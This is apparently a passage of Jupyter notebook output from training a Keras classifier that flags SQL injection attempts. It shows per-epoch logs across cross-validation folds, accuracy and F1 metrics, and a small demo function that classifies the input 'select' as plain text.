6493/6493 [==============================] - 1s 161us/step - loss: 0.3428 - acc: 0.9221
Epoch 4/10
6493/6493 [==============================] - 1s 159us/step - loss: 0.1990 - acc: 0.9644
Epoch 5/10
6493/6493 [==============================] - 1s 156us/step - loss: 0.1092 - acc: 0.9740
Epoch 6/10
6493/6493 [==============================] - 1s 168us/step - loss: 0.0769 - acc: 0.9787
Epoch 7/10
6493/6493 [==============================] - 1s 172us/step - loss: 0.0559 - acc: 0.9860
Epoch 8/10
6493/6493 [==============================] - 1s 173us/step - loss: 0.0429 - acc: 0.9897
Epoch 9/10
6493/6493 [==============================] - 1s 172us/step - loss: 0.0328 - acc: 0.9928
Epoch 10/10
6493/6493 [==============================] - 1s 169us/step - loss: 0.0258 - acc: 0.9949
722/722 [==============================] - 0s 409us/step
Epoch 1/10
6494/6494 [==============================] - 2s 370us/step - loss: 0.6671 - acc: 0.6152
Epoch 2/10
6494/6494 [==============================] - 1s 164us/step - loss: 0.5288 - acc: 0.7028
Epoch 3/10
6494/6494 [==============================] - 1s 166us/step - loss: 0.2928 - acc: 0.9195
Epoch 4/10
6494/6494 [==============================] - 1s 158us/step - loss: 0.1387 - acc: 0.9649
Epoch 5/10
6494/6494 [==============================] - 1s 162us/step - loss: 0.0784 - acc: 0.9772
Epoch 6/10
6494/6494 [==============================] - 1s 163us/step - loss: 0.0568 - acc: 0.9826
Epoch 7/10
6494/6494 [==============================] - 1s 161us/step - loss: 0.0404 - acc: 0.9875
Epoch 8/10
6494/6494 [==============================] - 1s 160us/step - loss: 0.0301 - acc: 0.9929
Epoch 9/10
6494/6494 [==============================] - 1s 164us/step - loss: 0.0224 - acc: 0.9938
Epoch 10/10
6494/6494 [==============================] - 1s 161us/step - loss: 0.0181 - acc: 0.9969
721/721 [==============================] - 0s 412us/step
Epoch 1/10
6494/6494 [==============================] - 3s 415us/step - loss: 0.6703 - acc: 0.6095 0s - loss: 0.6755 -
Epoch 2/10
6494/6494 [==============================] - 1s 197us/step - loss: 0.5711 - acc: 0.6230
Epoch 3/10
6494/6494 [==============================] - 1s 184us/step - loss: 0.3494 - acc: 0.8897
Epoch 4/10
6494/6494 [==============================] - 1s 155us/step - loss: 0.2176 - acc: 0.9678
Epoch 5/10
6494/6494 [==============================] - 1s 170us/step - loss: 0.1178 - acc: 0.9783
Epoch 6/10
6494/6494 [==============================] - 1s 161us/step - loss: 0.0728 - acc: 0.9806
Epoch 7/10
6494/6494 [==============================] - 2s 247us/step - loss: 0.0459 - acc: 0.9889
Epoch 8/10
6494/6494 [==============================] - 1s 168us/step - loss: 0.0340 - acc: 0.9918
Epoch 9/10
6494/6494 [==============================] - 1s 185us/step - loss: 0.0276 - acc: 0.9934
Epoch 10/10
6494/6494 [==============================] - 2s 286us/step - loss: 0.0210 - acc: 0.9948
721/721 [==============================] - 1s 916us/step
Epoch 1/10
6494/6494 [==============================] - 5s 812us/step - loss: 0.6677 - acc: 0.6167 0s - loss: 0.6699 - acc: 0
Epoch 2/10
6494/6494 [==============================] - 2s 317us/step - loss: 0.5794 - acc: 0.6734
Epoch 3/10
6494/6494 [==============================] - 2s 360us/step - loss: 0.3323 - acc: 0.8942
Epoch 4/10
6494/6494 [==============================] - 2s 354us/step - loss: 0.1565 - acc: 0.9584
Epoch 5/10

6494/6494 [==============================] - 2s 368us/step - loss: 0.0884 - acc: 0.9743
Epoch 6/10
6494/6494 [==============================] - 2s 375us/step - loss: 0.0611 - acc: 0.9803
Epoch 7/10
6494/6494 [==============================] - 3s 481us/step - loss: 0.0459 - acc: 0.9874
Epoch 8/10
6494/6494 [==============================] - 4s 549us/step - loss: 0.0356 - acc: 0.9905 0s - loss: 0.0354 - acc: 0
Epoch 9/10
6494/6494 [==============================] - 3s 498us/step - loss: 0.0303 - acc: 0.9932 2s - loss: 0.0365 - acc: 0. - ETA:
Epoch 10/10
6494/6494 [==============================] - 2s 244us/step - loss: 0.0230 - acc: 0.9948 2s - loss: 0.02
721/721 [==============================] - 0s 445us/step
Epoch 1/10
6494/6494 [==============================] - 3s 528us/step - loss: 0.6650 - acc: 0.6181 4s - loss: 0.6788
Epoch 2/10
6494/6494 [==============================] - 2s 242us/step - loss: 0.5362 - acc: 0.6846
Epoch 3/10
6494/6494 [==============================] - 1s 172us/step - loss: 0.2907 - acc: 0.9369
Epoch 4/10
6494/6494 [==============================] - 2s 236us/step - loss: 0.1543 - acc: 0.9706
Epoch 5/10
6494/6494 [==============================] - 1s 177us/step - loss: 0.0937 - acc: 0.9766
Epoch 6/10
6494/6494 [==============================] - 1s 210us/step - loss: 0.0675 - acc: 0.9824
Epoch 7/10
6494/6494 [==============================] - 1s 179us/step - loss: 0.0477 - acc: 0.9906
Epoch 8/10
6494/6494 [==============================] - 1s 206us/step - loss: 0.0396 - acc: 0.9914
Epoch 9/10
6494/6494 [==============================] - 2s 256us/step - loss: 0.0355 - acc: 0.9900
Epoch 10/10
6494/6494 [==============================] - 2s 325us/step - loss: 0.0265 - acc: 0.9951
721/721 [==============================] - 1s 2ms/step
Epoch 1/10
6494/6494 [==============================] - 3s 407us/step - loss: 0.6679 - acc: 0.6093
Epoch 2/10
6494/6494 [==============================] - 1s 191us/step - loss: 0.4988 - acc: 0.7254
Epoch 3/10
6494/6494 [==============================] - 1s 179us/step - loss: 0.2600 - acc: 0.9429
Epoch 4/10
6494/6494 [==============================] - 1s 181us/step - loss: 0.1361 - acc: 0.9677
Epoch 5/10
6494/6494 [==============================] - 2s 306us/step - loss: 0.0871 - acc: 0.9746
Epoch 6/10
6494/6494 [==============================] - 1s 174us/step - loss: 0.0629 - acc: 0.9837
Epoch 7/10
6494/6494 [==============================] - 1s 172us/step - loss: 0.0479 - acc: 0.9868
Epoch 8/10
6494/6494 [==============================] - 1s 172us/step - loss: 0.0367 - acc: 0.9921
Epoch 9/10
6494/6494 [==============================] - 1s 174us/step - loss: 0.0292 - acc: 0.9923
Epoch 10/10
6494/6494 [==============================] - 1s 169us/step - loss: 0.0255 - acc: 0.9943
721/721 [==============================] - 0s 603us/step

In [23]:
accuracies

array([0.97229917, 0.96814405, 0.97783934, 0.96952909, 0.96537396,
       0.96948683, 0.97226075, 0.98058253, 0.9778086 , 0.97503467])

In [24]:
print(np.average(accuracies))

0.9728358985613482

In [25]:
score=model.evaluate(X_test,y_test)
print(score)

2405/2405 [==============================] - 1s 286us/step
[0.07401089156762912, 0.9721413721413722]

In [58]:
from sklearn.metrics import classification_report,precision_score,recall_score,f1_score
y_pred = np.round(model.predict(X_test,verbose=1),decimals=0)
y_test
print("Precision is ",precision_score(y_pred,y_test))
print("Recall is ",recall_score(y_pred,y_test))
print("F1 score is ",f1_score(y_pred,y_test))

2405/2405 [==============================] - 0s 34us/step
Precision is  0.9548821548821549
Recall is  1.0
F1 score is  0.9769204271443335

In [29]:
def test(entry):
    entry=entry.lower()
    temp=[]
    temp.append(entry)
    token=tokenizer1.texts_to_sequences(temp)
    pad=pad_sequences(token, maxlen=150,padding="post")
    print(model.predict_proba(pad)[0][0])
    if(model.predict_proba(pad)[0][0]<0.91):
        print("Plain text detected")
    else:
        print("!!!!!!SQL INJECTION ATTEMPT DETECTED!!!!!!")
    
    return

In [30]:
def demo():
    entry=input()
    test(entry)

In [66]:
demo()

select
0.81446713
Plain text detected